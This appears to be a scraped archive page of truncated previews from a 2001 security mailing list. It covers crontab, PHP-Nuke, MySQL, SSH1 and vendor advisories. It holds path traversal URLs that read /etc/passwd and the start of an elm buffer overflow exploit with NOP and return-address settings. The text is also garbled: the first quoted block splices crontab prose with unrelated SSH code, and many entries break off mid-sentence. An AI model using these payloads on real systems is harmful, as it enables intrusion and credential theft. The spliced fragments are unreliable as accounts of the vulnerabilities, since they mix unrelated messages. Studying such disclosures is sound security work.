On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> When crontab has determined the name of the user calling crontab (using
> getpwuid()),
> the login name is stored in a 20 byte buffer using the strcpy() function
> (which does no bounds checking). 'useradd' (the utility used to add users
> 1){
> 2) static time_t last_kill_time = 0;
> 3) if (time(NULL) - last_kill_time > 60 && getppid() != 1)
> 4){
> 5) last_kill_time = time(NULL);
> 6) kill(SIGALRM, getppid());
> 7) }
> 8) fatal("Bad result from rsa_private_decrypt");
> 9)}
>
>
On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> the login name is stored in a 20 byte buffer using the strcpy() function
> (which does no bounds checking). 'useradd' (the utility used to add users
> to the system)
> however allows usernames of over 20 characters (32 at most on my dist
-- Forwarded message --
Date: Tue, 13 Feb 2001 03:53:58 -0800 (PST)
From: IT Resource Center <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: security bulletins digest
HP Support Information Digests
==
>When crontab has determined the name of the user calling crontab (using
>getpwuid()),
>the login name is stored in a 20 byte buffer using the strcpy() function
>(which does no bounds checking). 'useradd' (the utility used to add users
>to the system)
>however allows usernames of over 20 character
-/ RFP2101 /---/ rfp.labs / wiretrip/
RFPlutonium to fuel your PHP-Nuke
SQL hacking user logins in PHP-Nuke web portal
/ rain forest puppy / [EMAIL PROTECTED]
Table of contents:
-/ 1 / St
On Mon, 12 Feb 2001, Peter van Dijk wrote:
> The author obviously doesn't care about security.
He's not, and he makes it perfectly clear in the installation
instructions:
"3) In order to use the File Manager, please be sure to chmod 666 ALL
files and 777 ALL directories.
4) Also, to activate H
Follows are details of a vulnerability I recently discovered in W3.ORGS
sendtemp.pl.
Name: sendtemp.pl (W3C).
Remote: Yes
Local: Yes
Type:
sendtemp.pl: A part of the Amaya Web development server contains a file
disclosure vulnerability,
which allows remote, read access to files on the servers fi
On Monday 12 February 2001 18:22, you wrote:
> - Original Message -
> From: "Joao Gouveia" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding this issu
Hello,
I did other tests... and it didn't work here again on my 3 Linux
servers... look:
http://192.168.151.100/../../../../../../../../../../etc/passwd
http://192.168.151.150/../../../../../../../../../../etc/passwd
http://192.168.151.1/../../../../../../../../../../etc/passwd
All return me this me
At 03:19 PM 2/12/2001, Konrad Rieck wrote:
>A bof is a bof. You are completely right, but as I said and I still believe
>so, most buffer overflows are just bad coding practice. Don't get confused
>by all that hype, there are far more applications with buffer overflows
>in argv that are definitely
SECURITY ADVISORY 13th February 2001
--
Program: analog (logfile analysis program)
Versions: all versions except 4.16 and 4.90beta3
Operating systems: all
-
Hi,
I'm the person responsible for maintaining Apache JServ (which is actually a
product that is not being developed further as a result of being deprecated
in favor of Tomcat and Jasper) and I like to just clarify that this problem
is strictly within Oracle's product and not within Apache JServ
>> [users getting out of sync and passwords getting logged]
>Not always. I can think of one Windows SSH client off the top of my head
>that will prompt for the username and password separately - SecureCRT. I'm
>sure there are others as well that I'm just not thinking of right now...
Well, th
- Original Message -
From: "Konrad Rieck" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, February 12, 2001 9:19 PM
Subject: Re: Some more MySql security issues
> Maybe you can explain, how I will change my privileges on a system, when
> executing exactly such overflows, I can'
-BEGIN PGP SIGNED MESSAGE-
=
FreeBSD-SA-01:24 Security Advisory
FreeBSD, Inc.
Topic: SSH1 impleme
I have just tried this with WebSpirs 3.1
The URL I tried is..
http://www.targethost.com/spirs/webspirs.cgi?sp.nextform=../../../../../etc/passwd
It worked.. I also tried this with WebSpirs 4.2 and it did NOT work.. I have not tried
WebSpirs 4.3 yet.. Maybe it is cause you have it in your cgi-bin
Solution for Potential Vulnerability in Granting FilePermission to
Oracle Java Virtual Machine
Versions Affected
Oracle8i Release 3 (8.1.7)
Oracle Application Server 9iAS Release 1.0.2.0.1
Platforms Affected
All
Description of the Problem
A potential vulnerability in Oracle JVM has been discove
Hi,
MySql version 3.23.33 has been released, addressing these latest problems.
Change log in http://www.mysql.com/doc/N/e/News-3.23.33.html
Fixed buffer overrun in libmysqlclient library. Fixed bug in handling STOP
event after ROTATE event in replication.
Fixed another buffer overrun in DROP DATA
The newly announced FreSSH, when there is no /dev/urandom available,
uses a `fallback' to seed its PRNG that consists of:
int numfs, whichfs = 0;
struct statfs *mntbuf;
numfs = getmntinfo(&mntbuf, MNT_NOWAIT);
SIRC Incident Headline: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Affected Components:
Symantec pcAnywhere 9.0 and earlier
Incident Details:
On 02/11/01 05:22 PM, Zoa Chien of Securax.org reported a denial of service
in Symantec's pcAnywhere 9.0 in which pcAnywhere, configured as a host PC
Hi
Trustix has made available security updates for Trustix secure linux.
kernel:
Trustix specific: no
Distribution versions: All
A race condition in ptrace allows a malicious user to gain root. A
signedness error in the sysctl interface also potentially allows a user
to gain root.
proftpd:
Tru
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Greets.
This problem is known and fixed by the author and a patched
opendir.php file has been made available for download from the
phpnuke home site.
phpnuke home: http://www.phpnuke.org/
Patched opendir.php:
http://www.phpnuke.org/download.php?op=
You are so right!! Must have been very late or something...
I've checked whether it actually works...nope!
Crontab doesn't get more than 20 chars but somehow it copies them twice?
Strange
Mark
Mate Wierdl <[EMAIL PROTECTED]> wrote on 13-2-01 18:23:10:
>
>On Mon, Feb 12, 2001 at 10:14:00PM +0100,
this is just a proof of concept, i haven't included setgid call in the
shellcode:
/***
-
elm253-exploit.c
-
***/
#include
#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xba64
unsigned long dame_sp() {
__asm__("movl %esp,%eax");
* Andrew Brown <[EMAIL PROTECTED]> [010213 14:38] wrote:
> >When crontab has determined the name of the user calling crontab (using
> >getpwuid()),
> >the login name is stored in a 20 byte buffer using the strcpy() function
> >(which does no bounds checking). 'useradd' (the utility used to add use
On Mon, Feb 12, 2001 at 01:12:02PM -0500, gabriel rosenkoetter wrote:
> On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> > When crontab has determined the name of the user calling crontab (using
> > getpwuid()),
> > the login name is stored in a 20 byte buffer using the strcpy() functio
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
-BEGIN PGP SIGNED MESSAGE-
- --
gabriel rosenkoetter <[EMAIL PROTECTED]> wrote:
> On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> > When crontab has determined the name of the user calling crontab (using
> > getpwuid()),
> > the login name is stored in a 20 byte buffer using the strcpy() function
> > (which does no b
On Tue, Feb 13, 2001 at 03:54:00PM -0500, Alan DeKok wrote:
> I find this attitude amazing. You don't understand why other people
> would want to have usernames longer than 8 characters, so you're
> willing to blame *their* systems for security problems when insecure
> applications are executed
Hello,
In light of the recent posts to bugtraq concerning the
CORE SDI advisory that describes the SSH1 session
key recovery vulnerability a few things need to be
noted:
- CORE SDI does not provide support services to
SSH1 and does not maintain its source tree. However,
given the inst